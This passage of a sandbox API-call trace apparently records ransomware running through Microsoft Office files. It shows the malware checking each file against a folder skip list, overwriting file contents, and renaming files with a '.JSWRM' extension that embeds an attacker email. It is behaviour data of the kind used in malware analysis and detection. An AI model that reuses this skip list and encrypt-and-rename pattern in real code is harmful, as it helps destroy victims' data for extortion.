lpUsedDefaultChar=0x0) returned 11 [0136.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSO0127.ACL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0136.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSO0127.ACL", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSO0127.ACL", lpUsedDefaultChar=0x0) returned 11 [0136.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.981] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSO0127.ACL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mso0127.acl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0136.982] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=13202) returned 1 [0136.982] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.982] ReadFile (in: hFile=0x45c, lpBuffer=0x27b348, nNumberOfBytesToRead=0x3390, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345ec04*=0x3390, lpOverlapped=0x0) returned 1 [0136.984] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.984] WriteFile (in: hFile=0x45c, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x3390, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345ec00*=0x3390, lpOverlapped=0x0) returned 1 [0136.985] CloseHandle (hObject=0x45c) returned 1 [0136.985] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSO0127.ACL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mso0127.acl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSO0127.ACL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mso0127.acl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.986] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe24e42d8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe24e42d8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe2661a3d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3f0c0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSOCF.DLL", cAlternateFileName="")) returned 1 [0136.986] lstrcmpiW (lpString1="MSOCF.DLL", lpString2=".") returned 1 [0136.986] lstrcmpiW (lpString1="MSOCF.DLL", lpString2="..") returned 1 [0136.986] lstrcmpiW (lpString1="MSOCF.DLL", lpString2="...") returned 1 [0136.986] lstrcmpiW (lpString1="MSOCF.DLL", lpString2="windows") returned -1 [0136.986] lstrcmpiW (lpString1="MSOCF.DLL", lpString2="recovery") returned -1 [0136.986] lstrcmpiW (lpString1="MSOCF.DLL", lpString2="perflogs") returned -1 [0136.986] lstrcmpiW (lpString1="MSOCF.DLL", lpString2="documents and settings") returned 1 [0136.986] lstrcmpiW (lpString1="MSOCF.DLL", lpString2="$RECYCLE.BIN") returned 1 [0136.986] lstrcmpiW (lpString1="MSOCF.DLL", lpString2="system volume information") returned -1 [0136.986] lstrcmpiW (lpString1="MSOCF.DLL", lpString2="msocache") returned 1 [0136.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOCF.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0136.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOCF.DLL", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOCF.DLL", lpUsedDefaultChar=0x0) returned 9 [0136.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOCF.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0136.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOCF.DLL", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOCF.DLL", lpUsedDefaultChar=0x0) returned 9 [0136.986] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddaac59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddaac59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf16bd2da, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6070, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSOCFUIUTILITIESDLL.DLL", cAlternateFileName="MSOCFU~1.DLL")) returned 1 [0136.986] lstrcmpiW (lpString1="MSOCFUIUTILITIESDLL.DLL", lpString2=".") returned 1 [0136.986] lstrcmpiW (lpString1="MSOCFUIUTILITIESDLL.DLL", lpString2="..") returned 1 [0136.986] lstrcmpiW (lpString1="MSOCFUIUTILITIESDLL.DLL", lpString2="...") returned 1 [0136.986] lstrcmpiW (lpString1="MSOCFUIUTILITIESDLL.DLL", lpString2="windows") returned -1 [0136.986] lstrcmpiW (lpString1="MSOCFUIUTILITIESDLL.DLL", lpString2="recovery") returned -1 [0136.986] lstrcmpiW (lpString1="MSOCFUIUTILITIESDLL.DLL", lpString2="perflogs") returned -1 [0136.987] lstrcmpiW (lpString1="MSOCFUIUTILITIESDLL.DLL", lpString2="documents and settings") returned 1 [0136.987] lstrcmpiW (lpString1="MSOCFUIUTILITIESDLL.DLL", lpString2="$RECYCLE.BIN") returned 1 [0136.987] lstrcmpiW (lpString1="MSOCFUIUTILITIESDLL.DLL", lpString2="system volume information") returned -1 [0136.987] lstrcmpiW (lpString1="MSOCFUIUTILITIESDLL.DLL", lpString2="msocache") returned 1 [0136.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOCFUIUTILITIESDLL.DLL", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0136.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOCFUIUTILITIESDLL.DLL", cchWideChar=23, lpMultiByteStr=0x2410d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOCFUIUTILITIESDLL.DLL", lpUsedDefaultChar=0x0) returned 23 [0136.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOCFUIUTILITIESDLL.DLL", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0136.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOCFUIUTILITIESDLL.DLL", cchWideChar=23, lpMultiByteStr=0x241100, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOCFUIUTILITIESDLL.DLL", lpUsedDefaultChar=0x0) returned 23 [0136.987] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddaac59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1b382177, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b3a83c3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xed650, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSOCR.DLL", cAlternateFileName="")) returned 1 [0136.987] lstrcmpiW (lpString1="MSOCR.DLL", lpString2=".") returned 1 [0136.987] lstrcmpiW (lpString1="MSOCR.DLL", lpString2="..") returned 1 [0136.987] lstrcmpiW (lpString1="MSOCR.DLL", lpString2="...") returned 1 [0136.987] lstrcmpiW (lpString1="MSOCR.DLL", lpString2="windows") returned -1 [0136.987] lstrcmpiW (lpString1="MSOCR.DLL", lpString2="recovery") returned -1 [0136.987] lstrcmpiW (lpString1="MSOCR.DLL", lpString2="perflogs") returned -1 [0136.987] lstrcmpiW (lpString1="MSOCR.DLL", lpString2="documents and settings") returned 1 [0136.987] lstrcmpiW (lpString1="MSOCR.DLL", lpString2="$RECYCLE.BIN") returned 1 [0136.987] lstrcmpiW (lpString1="MSOCR.DLL", lpString2="system volume information") returned -1 [0136.987] lstrcmpiW (lpString1="MSOCR.DLL", lpString2="msocache") returned 1 [0136.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOCR.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0136.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOCR.DLL", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOCR.DLL", lpUsedDefaultChar=0x0) returned 9 [0136.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOCR.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0136.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOCR.DLL", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOCR.DLL", lpUsedDefaultChar=0x0) returned 9 [0136.987] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddaac59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddaac59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x2169a085, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x24c3218, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSOCRRES.ORP", cAlternateFileName="")) returned 1 [0136.987] lstrcmpiW (lpString1="MSOCRRES.ORP", lpString2=".") returned 1 [0136.987] lstrcmpiW (lpString1="MSOCRRES.ORP", lpString2="..") returned 1 [0136.987] lstrcmpiW (lpString1="MSOCRRES.ORP", lpString2="...") returned 1 [0136.987] lstrcmpiW (lpString1="MSOCRRES.ORP", lpString2="windows") returned -1 [0136.987] lstrcmpiW (lpString1="MSOCRRES.ORP", lpString2="recovery") returned -1 [0136.987] lstrcmpiW (lpString1="MSOCRRES.ORP", lpString2="perflogs") returned -1 [0136.988] lstrcmpiW (lpString1="MSOCRRES.ORP", lpString2="documents and settings") returned 1 [0136.988] lstrcmpiW (lpString1="MSOCRRES.ORP", lpString2="$RECYCLE.BIN") returned 1 [0136.988] lstrcmpiW (lpString1="MSOCRRES.ORP", lpString2="system volume information") returned -1 [0136.988] lstrcmpiW (lpString1="MSOCRRES.ORP", lpString2="msocache") returned 1 [0136.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOCRRES.ORP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0136.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOCRRES.ORP", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOCRRES.ORP", lpUsedDefaultChar=0x0) returned 12 [0136.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOCRRES.ORP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0136.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOCRRES.ORP", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOCRRES.ORP", lpUsedDefaultChar=0x0) returned 12 [0136.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.988] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSOCRRES.ORP" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msocrres.orp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0136.989] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=38547992) returned 1 [0136.989] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.990] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0137.029] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.029] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0137.030] CloseHandle (hObject=0x45c) returned 1 [0137.030] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSOCRRES.ORP" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msocrres.orp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSOCRRES.ORP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msocrres.orp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.032] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddaac59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddaac59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x5101cbd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x152c0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="msoetwres.dll", cAlternateFileName="MSOETW~1.DLL")) returned 1 [0137.032] lstrcmpiW (lpString1="msoetwres.dll", lpString2=".") returned 1 [0137.032] lstrcmpiW (lpString1="msoetwres.dll", lpString2="..") returned 1 [0137.032] lstrcmpiW (lpString1="msoetwres.dll", lpString2="...") returned 1 [0137.032] lstrcmpiW (lpString1="msoetwres.dll", lpString2="windows") returned -1 [0137.032] lstrcmpiW (lpString1="msoetwres.dll", lpString2="recovery") returned -1 [0137.032] lstrcmpiW (lpString1="msoetwres.dll", lpString2="perflogs") returned -1 [0137.032] lstrcmpiW (lpString1="msoetwres.dll", lpString2="documents and settings") returned 1 [0137.032] lstrcmpiW (lpString1="msoetwres.dll", lpString2="$RECYCLE.BIN") returned 1 [0137.032] lstrcmpiW (lpString1="msoetwres.dll", lpString2="system volume information") returned -1 [0137.032] lstrcmpiW (lpString1="msoetwres.dll", lpString2="msocache") returned 1 [0137.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msoetwres.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0137.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msoetwres.dll", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msoetwres.dll", lpUsedDefaultChar=0x0) returned 13 [0137.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msoetwres.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0137.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msoetwres.dll", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msoetwres.dll", lpUsedDefaultChar=0x0) returned 13 [0137.033] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xed388c20, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed388c20, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xede4358a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa6b0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="msoev.exe", cAlternateFileName="")) returned 1 [0137.033] lstrcmpiW (lpString1="msoev.exe", lpString2=".") returned 1 [0137.033] lstrcmpiW (lpString1="msoev.exe", lpString2="..") returned 1 [0137.033] lstrcmpiW (lpString1="msoev.exe", lpString2="...") returned 1 [0137.033] lstrcmpiW (lpString1="msoev.exe", lpString2="windows") returned -1 [0137.033] lstrcmpiW (lpString1="msoev.exe", lpString2="recovery") returned -1 [0137.033] lstrcmpiW (lpString1="msoev.exe", lpString2="perflogs") returned -1 [0137.034] lstrcmpiW (lpString1="msoev.exe", lpString2="documents and settings") returned 1 [0137.034] lstrcmpiW (lpString1="msoev.exe", lpString2="$RECYCLE.BIN") returned 1 [0137.034] lstrcmpiW (lpString1="msoev.exe", lpString2="system volume information") returned -1 [0137.034] lstrcmpiW (lpString1="msoev.exe", lpString2="msocache") returned 1 [0137.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msoev.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0137.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msoev.exe", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msoev.exe", lpUsedDefaultChar=0x0) returned 9 [0137.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msoev.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0137.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msoev.exe", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msoev.exe", lpUsedDefaultChar=0x0) returned 9 [0137.034] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc369dacd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc369dacd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc3a5762f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x19c60, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSOHEV.DLL", cAlternateFileName="")) returned 1 [0137.034] lstrcmpiW (lpString1="MSOHEV.DLL", lpString2=".") returned 1 [0137.034] lstrcmpiW (lpString1="MSOHEV.DLL", lpString2="..") returned 1 [0137.034] lstrcmpiW (lpString1="MSOHEV.DLL", lpString2="...") returned 1 [0137.034] lstrcmpiW (lpString1="MSOHEV.DLL", lpString2="windows") returned -1 [0137.034] lstrcmpiW (lpString1="MSOHEV.DLL", lpString2="recovery") returned -1 [0137.034] lstrcmpiW (lpString1="MSOHEV.DLL", lpString2="perflogs") returned -1 [0137.034] lstrcmpiW (lpString1="MSOHEV.DLL", lpString2="documents and settings") returned 1 [0137.034] lstrcmpiW (lpString1="MSOHEV.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.034] lstrcmpiW (lpString1="MSOHEV.DLL", lpString2="system volume information") returned -1 [0137.034] lstrcmpiW (lpString1="MSOHEV.DLL", lpString2="msocache") returned 1 [0137.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOHEV.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0137.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOHEV.DLL", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOHEV.DLL", lpUsedDefaultChar=0x0) returned 10 [0137.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOHEV.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0137.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOHEV.DLL", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOHEV.DLL", lpUsedDefaultChar=0x0) returned 10 [0137.034] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddaac59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddaac59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x2f5480d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14860, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSOHEVI.DLL", cAlternateFileName="")) returned 1 [0137.034] lstrcmpiW (lpString1="MSOHEVI.DLL", lpString2=".") returned 1 [0137.034] lstrcmpiW (lpString1="MSOHEVI.DLL", lpString2="..") returned 1 [0137.034] lstrcmpiW (lpString1="MSOHEVI.DLL", lpString2="...") returned 1 [0137.034] lstrcmpiW (lpString1="MSOHEVI.DLL", lpString2="windows") returned -1 [0137.034] lstrcmpiW (lpString1="MSOHEVI.DLL", lpString2="recovery") returned -1 [0137.034] lstrcmpiW (lpString1="MSOHEVI.DLL", lpString2="perflogs") returned -1 [0137.034] lstrcmpiW (lpString1="MSOHEVI.DLL", lpString2="documents and settings") returned 1 [0137.035] lstrcmpiW (lpString1="MSOHEVI.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.035] lstrcmpiW (lpString1="MSOHEVI.DLL", lpString2="system volume information") returned -1 [0137.035] lstrcmpiW (lpString1="MSOHEVI.DLL", lpString2="msocache") returned 1 [0137.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOHEVI.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOHEVI.DLL", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOHEVI.DLL", lpUsedDefaultChar=0x0) returned 11 [0137.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOHEVI.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOHEVI.DLL", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOHEVI.DLL", lpUsedDefaultChar=0x0) returned 11 [0137.035] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe238cd90, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe238cd90, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe24e42d8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x17060, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSOHTMED.EXE", cAlternateFileName="")) returned 1 [0137.035] lstrcmpiW (lpString1="MSOHTMED.EXE", lpString2=".") returned 1 [0137.035] lstrcmpiW (lpString1="MSOHTMED.EXE", lpString2="..") returned 1 [0137.035] lstrcmpiW 